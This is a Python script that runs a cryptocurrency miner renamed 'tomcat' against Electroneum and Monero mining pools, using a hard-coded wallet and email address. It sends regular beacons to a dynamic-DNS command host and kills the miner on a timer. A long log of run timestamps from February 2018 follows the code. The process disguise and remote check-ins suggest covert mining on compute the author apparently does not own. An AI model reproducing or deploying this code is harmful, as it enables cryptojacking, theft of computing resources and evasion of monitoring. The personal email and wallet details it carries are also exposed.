import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:35:08.516492
#2018-02-17 17:23:01.890966
#2018-02-17 19:11:06.869202
#2018-02-17 20:59:05.779078
#2018-02-17 22:45:07.396672
#2018-02-18 00:28:01.716023
#2018-02-18 02:19:01.600655
#2018-02-18 04:06:07.476924
#2018-02-18 05:57:05.462094
#2018-02-18 07:48:04.266471
#2018-02-18 09:36:03.234935
#2018-02-18 11:22:04.342797
#2018-02-18 13:08:05.597106
#2018-02-18 14:56:05.147607
#2018-02-18 16:44:04.417042
#2018-02-18 18:33:06.652475
#2018-02-18 20:21:03.409215
#2018-02-18 22:07:05.922896
#2018-02-18 23:55:04.889785
#2018-02-19 01:41:04.828692
#2018-02-19 03:29:04.550188
#2018-02-19 05:15:07.694515
#2018-02-19 07:03:03.826597
#2018-02-19 08:52:04.054974
#2018-02-19 10:41:04.082772
#2018-02-19 12:28:04.044892
#2018-02-19 14:16:01.289837
#2018-02-19 16:05:04.090309
#2018-02-19 17:53:03.774932
#2018-02-19 19:38:08.168171
#2018-02-19 21:27:07.767158
#2018-02-19 23:13:06.595920
#2018-02-20 00:58:03.306272
#2018-02-20 02:47:01.616526
#2018-02-20 04:35:05.973883
#2018-02-20 06:19:05.433784
#2018-02-20 08:04:06.549600
#2018-02-20 09:50:10.658368
#2018-02-20 11:33:11.149754
#2018-02-20 13:19:04.173624
#2018-02-20 15:06:04.882618
#2018-02-20 16:50:10.596117
#2018-02-20 18:38:09.030892
#2018-02-20 20:28:01.358389
#2018-02-20 22:13:01.378411
#2018-02-20 23:54:05.366334
#2018-02-21 01:41:03.537378
#2018-02-21 03:29:01.439676
#2018-02-21 05:17:01.769896
#2018-02-21 07:05:03.248415
#2018-02-21 08:51:07.850022
#2018-02-21 10:39:06.336814
#2018-02-21 12:26:05.369266
#2018-02-21 14:13:01.634436
#2018-02-21 15:59:07.157119
#2018-02-21 17:52:01.394379
#2018-02-21 19:39:09.483474
#2018-02-21 21:27:04.253962
#2018-02-21 23:14:07.398186
#2018-02-22 01:04:06.292622
#2018-02-22 02:51:05.173738
#2018-02-22 04:38:01.887886
#2018-02-22 06:22:04.468617
#2018-02-22 08:09:06.870160
#2018-02-22 09:57:07.075660
#2018-02-22 11:43:06.095452
#2018-02-22 13:29:08.717881
#2018-02-22 15:17:08.259958
#2018-02-22 17:02:08.103097
#2018-02-22 18:50:06.502481
#2018-02-22 20:41:04.877794
#2018-02-22 22:26:01.835010
#2018-02-23 00:11:04.497113
#2018-02-23 02:00:01.603167
#2018-02-23 03:48:04.008023
#2018-02-23 05:38:06.199911
#2018-02-23 07:23:07.778768
#2018-02-23 09:28:08.691074
#2018-02-23 11:34:02.135728
#2018-02-23 13:24:05.650236
#2018-02-23 15:10:03.094699
#2018-02-23 16:59:01.504848
#2018-02-23 18:48:09.873950
#2018-02-23 20:34:07.342826
#2018-02-23 22:21:04.410340
#2018-02-24 00:06:06.017387
#2018-02-24 01:57:02.071567
#2018-02-24 03:49:02.256034
#2018-02-24 05:37:05.038400
#2018-02-24 07:23:06.497164
#2018-02-24 09:12:07.336370
#2018-02-24 11:09:05.049896
#2018-02-24 12:57:01.776459
#2018-02-24 14:45:09.457455
#2018-02-24 16:39:01.640850
#2018-02-24 18:28:06.287878
#2018-02-24 20:15:07.559608
#2018-02-24 22:06:01.892639
#2018-02-25 01:04:01.274988
#2018-02-25 04:43:05.601706
#2018-02-25 08:45:05.012345